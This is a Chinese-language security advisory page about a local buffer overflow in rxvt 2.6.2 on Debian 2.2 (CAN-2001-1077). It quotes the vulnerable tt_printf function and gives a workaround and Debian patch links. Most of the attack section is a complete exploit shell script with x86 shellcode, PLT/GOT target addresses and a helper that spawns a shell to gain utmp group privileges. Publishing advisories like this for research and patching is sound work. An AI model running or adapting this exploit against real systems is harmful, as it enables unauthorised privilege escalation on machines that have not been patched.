首页 -> 安全研究

安全研究

安全漏洞
Rxvt 本地缓冲区溢出漏洞

发布日期:2001-06-15
更新日期:2001-06-25

受影响系统:

rxvt 2.6.2
   - Debian Linux 2.2 sparc
   - Debian Linux 2.2 powerpc
   - Debian Linux 2.2 arm
   - Debian Linux 2.2 alpha
   - Debian Linux 2.2 68k
   - Debian Linux 2.2
描述:

BUGTRAQ  ID: 2878
CVE(CAN) ID: CAN-2001-1077

Rxvt 是一个彩色VT102中断仿真程序,可以作为xterm的替代软件。

rxvt存在一个缓冲区溢出漏洞。如果给它的某些命令行选项("-T"或者"-name")提供超长
的参数,就会触发缓冲区溢出。rxvt在某些系统下被设置了setgid utmp属性,本地攻击
者可能利用这个漏洞来获取utmp组权限。

有问题的代码在tt_printf()函数:

void
tt_printf(const char *fmt,...)
{
    int i;
    va_list         arg_ptr;
    unsigned char   buf[256];

    va_start(arg_ptr, fmt);
    vsprintf(buf, fmt, arg_ptr);
    va_end(arg_ptr);
    tt_write(buf, strlen(buf));
}

<*来源:Samuel "Zorgon" Dralet (samuel.dralet@mastersecurity.fr) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Samuel "Zorgon" Dralet (samuel.dralet@mastersecurity.fr) 提供了
如下测试代码:

#!/bin/sh

#
# MasterSecuritY <www.mastersecurity.fr>
#
# xrxvt.sh - Local exploit for xrxvt 2.6.2
# Copyright (C) 2001  Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
# Copyright (C) 2001  Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

echo "rxvt-2.6.2 exploit for Linux Debian 2.2"
echo "Which target :"
echo -e "\t0. rxvt 2.6.2 (package deb) on Debian 2.2"
echo -e "\t1. rxvt 2.6.2 (tarball) on Debian 2.2"
echo
echo -n "target : "

read TARGET

cat > /tmp/xx.c <<EOF
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main()
{
    char * p_ttyname;
    char * argv[] = { "/bin/sh", NULL };

    p_ttyname = ttyname( STDERR_FILENO );
    if ( p_ttyname == NULL ) {
        return( -1 );
    }
    if ( open(p_ttyname, O_RDONLY) != STDIN_FILENO ) {
        return( -1 );
    }
    if ( open(p_ttyname, O_WRONLY) != STDOUT_FILENO ) {
        return( -1 );
    }

    execve( argv[0], argv, NULL );
    return( -1 );
}
EOF
gcc -o /tmp/xx /tmp/xx.c
rm -f /tmp/xx.c

cat > /tmp/xrxvt.c << EOF
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <X11/X.h>
#include <X11/Xlib.h>

#define BUF 256    /* buffer size */
#define EBP 4     
#define EIP 4
#define ESC 3    /* alignment */

#define GID "\x2b"
#define DISPLAY ":0"
#define STACK ( 0xc0000000 - 4 )

Display *d;

char shellcode[] =
/* setregid( -1, GID ); */
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* setregid( GID, GID ); */
"\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* Aleph One ;) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/xx";

struct os
{
    int id;
    char *desc;
    char *path;
    unsigned long plt;
    unsigned long got;
};

struct os target[]=
{
    { 0, "rxvt 2.6.2 (package deb) on Debian 2.2", "/usr/X11R6/bin/rxvt-xterm",
      0x0804add0, 0x0805c964 },
    { 1, "rxvt 2.6.2 (tarball) on Debian 2.2", "/usr/local/bin/rxvt",
      0x0804a690, 0x08059e1c },
    { 2, NULL, 0, 0 }
};

void usage ( char *cmd )
{
    int i;
    fprintf(stderr, "rxvt-2.6.2 exploit for Linux Debian 2.2\n");
    fprintf(stderr, "usage: %s <target>\n",cmd);
    fprintf(stderr, "with target:\n\n");
    for( i < 0; i < sizeof(target) / sizeof(struct os); i++ )
    fprintf(stderr, "%d. %s\n", i, target[i].desc);

    exit( -1 );    
}

int main(int argc, char *argv[])
{
    char buffer[ BUF - ESC + EBP + EIP + 12 + 1];
    char * exec_argv[] = { NULL, "-T", buffer, NULL };
    char * envp[] = { shellcode, NULL };
    int i, t;
    char *path;

    if ( argc != 2 )
    usage(argv[0]);

    t = atoi(argv[1]);
    if( t < 0 || t >= sizeof(target) / sizeof(struct os) )
    usage( argv[0] );

    path = (char *)malloc(strlen(target[t].path)+1);    
    strcpy(path,target[t].path);
         
    if ( (d = XOpenDisplay(DISPLAY)) == NULL ){
    fprintf(stderr, "Unable to open display: %s\n", DISPLAY);
    exit(10);
    }

    for ( i = 0; i < BUF - ESC + EBP; i++ ) {
    buffer[ i ] = 'A';
    }

    *( (size_t *) &(buffer[i]) ) = target[t].plt;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = target[t].got + 4;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = target[t].got + 4;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = STACK - (strlen(path) + 1) - sizeof(shellcode);
    i += sizeof(size_t);
  
    buffer[i] = '\0';

    exec_argv[0] = path;
    execve( exec_argv[0], exec_argv, envp );
    return( -1 );
}
EOF
gcc -o /tmp/xrxvt /tmp/xrxvt.c -lX11
rm -f /tmp/xrxvt.c

echo "Go to rxvt window and type 'echo -ne \"\033[21t\"' ..."
echo "And see ..."
/tmp/xrxvt $TARGET



建议:

临时解决方法:

我们建议您暂时去掉rxvt的setuid/setgid属性:
# chmod a-s rxvt

厂商补丁:

Debian Linux (http://www.debian.org/security/)为此发布了一份安全公告 :
DSA-062-1 rxvt: buffer overflow
http://www.debian.org/security/2001/dsa-062

补丁下载 -
________________________________________________________________________
Debian GNU/Linux 2.2 (potato)

Source:
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.dsc
http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2.orig.tar.gz

Alpha:
http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt-ml_2.6.2-2.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt_2.6.2-2.1_alpha.deb

ARM:
http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt-ml_2.6.2-2.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt_2.6.2-2.1_arm.deb

Intel IA-32:
http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt-ml_2.6.2-2.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt_2.6.2-2.1_i386.deb

Motorola 680x0:
http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt-ml_2.6.2-2.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt_2.6.2-2.1_m68k.deb

PowerPC:
http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt-ml_2.6.2-2.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt_2.6.2-2.1_powerpc.deb

Sun Sparc:
http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt-ml_2.6.2-2.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt_2.6.2-2.1_sparc.deb

________________________________________________________________________


浏览次数:4159
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客